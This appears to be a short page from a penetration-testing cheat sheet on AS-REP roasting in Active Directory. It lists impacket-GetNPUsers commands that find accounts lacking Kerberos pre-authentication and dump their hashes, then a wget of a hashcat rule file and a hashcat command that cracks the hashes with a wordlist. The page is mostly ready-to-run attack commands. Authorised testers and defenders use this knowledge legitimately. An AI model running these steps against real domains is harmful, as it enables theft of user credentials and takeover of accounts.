As-Rep Roasting

Locate As-Rep Roastable Users (NTLM)

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER

Collect As-Rep Tickets

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER -format hashcat -outputfile asrep.hash

Crack Ticket

wget https://github.com/stealthsploit/OneRuleToRuleThemStill/raw/refs/heads/main/OneRuleToRuleThemStill.rule
hashcat -m 18200 -a 0 asrep.hash rockyou.txt -r OneRuleToRuleThemStill.rule

The above is more of a POC on how to crack the hash, however, I'd STRONGLY recommend using something powerful to crack this hash as the above will take a long time. If you have have a powerful GPU, take a look into NPK or VPK.

PreviousTimeroasting NextCreate Machine Account

Last updated 1 month ago